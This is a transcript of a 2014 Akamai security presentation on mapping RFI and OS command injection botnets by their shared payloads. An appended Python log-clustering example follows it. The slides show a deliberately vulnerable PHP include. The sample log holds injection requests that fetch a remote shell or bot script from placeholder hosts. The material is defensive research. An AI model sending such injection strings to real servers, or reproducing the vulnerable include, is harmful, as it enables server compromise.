Q4 2014 security report botnet profiling technique presentation

akamai.com [Q4 2014]

Transcript of Q4 2014 security report botnet profiling technique presentation


= botnet profiling technique

• New analysis technique using data from the Akamai Intelligent Platform™
• Automate discovery of web application vulnerabilities for Remote File Inclusion (RFI) and OS Command Injection attacks
• Botnets profiled by identifying malicious code resource URLs and seemingly identical payloads
• Analysis does not require inclusion in the botnet or taking over the botnet’s command and control (C&C, C2) server

[Download the Q4 2014 Global DDoS Attack Report for supporting data and analysis]

2 / [The State of the Internet] / Security (Q4 2014)

= Remote File Inclusion (RFI) attacks

• Used to exploit dynamic file include mechanisms in web applications
• Web application can be tricked into including remote files with malicious code
• RFI vulnerabilities are easily found and exploited by attackers

    <?php
    // Attacker-controlled value taken straight from the query string
    $dir = $_GET['module_name'];
    // The untrusted value becomes an include path: with allow_url_include enabled,
    // a module_name of http://... makes PHP fetch and execute a remote file
    include($dir . "/function.php");

Figure 1: Code vulnerable to a Remote File Inclusion attack

= OS Command Injection

• Used to execute unauthorized operating system commands
• The result of mixing trusted code with untrusted data
• Commands executed by the attacker will run with the same privileges as the commanding component
• Attackers can leverage this ability to gain access to, and damage, parts that are not otherwise reachable

= common payloads in botnets

• RFI and OS Command Injection are among the most prevalent vulnerabilities reported
• Attacker can take full control over the victim server
• The most favorable attack vector
• In recent months, Akamai has observed massively orchestrated attempts to find such vulnerabilities
• Botnet machines, even geographically disparate machines belonging to different organizations, try to inject the same remote piece of malicious code
• Code correlations enabled Akamai to map multiple Internet botnets operating at the time of the comparison

= botnet findings

• RFI and OS Command Injection botnets targeted more than 850 web applications across several top-level domains over a seven-day period
• All of the botnet traffic appeared to originate from compromised servers, most from popular Software-as-a-Service (SaaS) and cloud hosting providers
• The botnet Akamai analyzed included a dedicated Python script that performed web crawling disguised as a Microsoft Bing bot
• In one instance, an observed botnet propagated through two WordPress TimThumb vulnerabilities

= analysis of botnet capabilities

Both RFI and OS Command Injection attacks used the same malicious code involving:

• Remote shell command execution
• Remote file upload (see figure)
• SMS sending, controlled by IRC commands
• Local FTP server credentials brute force attack
• IRC-controlled UDP/TCP denial of service flood

Figure 2: Code for remote file upload

= conclusion

• Novel approach to understanding web application-layer botnets
• Used attack payload as the common denominator to aggregate data and map botnet information
• Does not require the researcher to be a part of the botnet or to take over the botnet’s C2 server
• Can be used for mapping other types of malicious activities that use a distinct payload
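The payload-as-common-denominator idea behind the technique (the profiling, common payloads and conclusion slides), as an added Python example that is not part of the Akamai presentation: it pulls the remote resource URL out of RFI and command-injection requests in web server access logs and groups source IPs by that URL, so hosts injecting the same payload fall into one cluster. The log lines, IP addresses and hostnames (evil.example, other.example) are constructed placeholders, and the RFI versus command-injection labelling is a crude heuristic of my own, not Akamai's classifier.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Constructed Common Log Format lines (placeholder IPs and hostnames, not real traffic).
# Two sources inject the same remote PHP shell via the module_name parameter (RFI);
# two others chain a wget of the same bot script onto a ping CGI (OS command injection).
SAMPLE_LOG = """\
203.0.113.5 - - [01/Dec/2014:10:00:01 +0000] "GET /index.php?module_name=http://evil.example/sh.txt?? HTTP/1.1" 200 512
198.51.100.7 - - [01/Dec/2014:10:00:03 +0000] "GET /index.php?module_name=http://evil.example/sh.txt?? HTTP/1.1" 200 512
192.0.2.9 - - [01/Dec/2014:10:00:05 +0000] "GET /cgi-bin/ping.cgi?host=127.0.0.1;wget%20http://other.example/bot.pl HTTP/1.1" 500 0
203.0.113.5 - - [01/Dec/2014:10:00:07 +0000] "GET /page.php?id=3 HTTP/1.1" 200 1024
198.51.100.8 - - [01/Dec/2014:10:00:09 +0000] "GET /cgi-bin/ping.cgi?host=127.0.0.1;wget%20http://other.example/bot.pl HTTP/1.1" 500 0
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
REMOTE_URL_RE = re.compile(r'(?:https?|ftp)://\S+', re.IGNORECASE)
SHELL_META_RE = re.compile(r'[;|`]|&&|\$\(')   # heuristic, not an exhaustive metacharacter list


def classify(query):
    """Heuristic label: shell metacharacters in the query suggest OS command injection, else RFI."""
    return 'cmd-injection' if SHELL_META_RE.search(query) else 'rfi'


def extract_payload(path):
    """Return (attack class, remote resource URL) for a request path, or None if no remote URL."""
    query = unquote(urlsplit(path).query)       # decode %20 etc. before looking for the URL
    match = REMOTE_URL_RE.search(query)
    if not match:
        return None
    # RFI payloads often end in '??' to neutralise the appended '/function.php'; drop it
    return classify(query), match.group(0).rstrip('?')


def profile_botnets(log_text):
    """Group distinct source IPs by the (attack class, payload URL) they tried to inject."""
    clusters = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                            # not a request line we understand
        src, path = m.groups()
        key = extract_payload(path)
        if key:
            clusters[key].add(src)
    return {k: sorted(v) for k, v in clusters.items()}


if __name__ == '__main__':
    for (kind, payload), sources in profile_botnets(SAMPLE_LOG).items():
        print(f"{kind:14} {payload:30} {len(sources)} sources: {', '.join(sources)}")
```

On real logs the same grouping is run across many sites, which is what lets unrelated servers that inject one payload URL be attributed to one botnet without touching its C2.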

= Q4 2014 global attack report

• Download the Q4 2014 State of the Internet Security Report
• The Q4 2014 report covers:
  / Analysis of DDoS attack trends
  / Breakdown of average Gbps/Mbps statistics
  / Year-over-year and quarter-by-quarter analysis
  / Types and frequency of application-layer attacks
  / Types and frequency of infrastructure attacks
  / Trends in attack frequency, size and sources
  / Where and when DDoSers launch attacks
  / Case study and analysis

= about Prolexic

• StateoftheInternet.com, brought to you by Akamai, serves as the home for content and information intended to provide an informed view into online connectivity and cybersecurity trends as well as related metrics, including Internet connection speeds, broadband adoption, mobile usage, outages, and cyber-attacks and threats.
• Visitors to www.stateoftheinternet.com can find current and archived versions of Akamai’s State of the Internet (Connectivity and Security) reports, the company’s data visualizations, and other resources designed to put context around the ever-changing Internet landscape.